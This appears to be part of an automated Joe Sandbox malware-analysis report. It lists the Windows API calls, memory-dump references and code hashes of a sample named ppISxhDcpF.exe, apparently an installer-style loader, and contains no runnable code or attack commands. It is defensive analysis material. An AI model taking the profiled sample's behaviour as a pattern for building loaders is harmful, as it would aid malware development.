                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 390214022-0
                                                                                                                • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                                • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                                • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000468,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                                • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                                • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,?,00000000), ref: 00405CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,?,00000000,00000000,00000000), ref: 00405CC1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                                • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004015A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                                • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                                • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                                • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                                • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                • ShowWindow.USER32(?,?), ref: 00405440
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                  • Part of subcall function 0040414E: SendMessageW.USER32(?,?,00000001,00403F7A), ref: 0040415C
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                • ShowWindow.USER32(?,?), ref: 004054F1
                                                                                                                • ShowWindow.USER32(?), ref: 0040553B
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                • CloseClipboard.USER32 ref: 00405676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: {
                                                                                                                • API String ID: 590372296-366298937
                                                                                                                • Opcode ID: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                • Opcode Fuzzy Hash: 6a0fc3a2d5fa7d70d7ffe9782798eb57218c845f869a5f65bcd99de69d398bf2
                                                                                                                • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 00404727
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\ppISxhDcpF.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\ppISxhDcpF.exe",75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$Call
                                                                                                                • API String ID: 2624150263-3276236015
                                                                                                                • Opcode ID: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                • Opcode Fuzzy Hash: 97dbdcd0a7a2851c12e583ff475ec9ec315e271f733aa0b940815c47a6976e5e
                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                • Instruction ID: 1644c94297a6e2d1b4e9f0aeee9f0c77f66fc5de92a1577942f5ef847e7267c5
                                                                                                                • Opcode Fuzzy Hash: df035667192aca5c3680bb857e8dd47c0aa2c6f6aae311b2a540ed6b21077dfa
                                                                                                                • Instruction Fuzzy Hash: 8DE17A7190070ADFDB24CF58C890BAAB7F5FB45305F15892EE497A7291D738AAA1CF04
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                • Instruction ID: 4e7e9ca0714fd30891db9328173e30945d26479923c7842d5bcb9add60bdfbdd
                                                                                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                                                • Instruction Fuzzy Hash: 4BC14931E04219DBDF18CF68C4905EEB7B2BF98314F25826AD8567B384D7346A42CF95
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                • GetSysColor.USER32(?), ref: 00404396
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040451D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
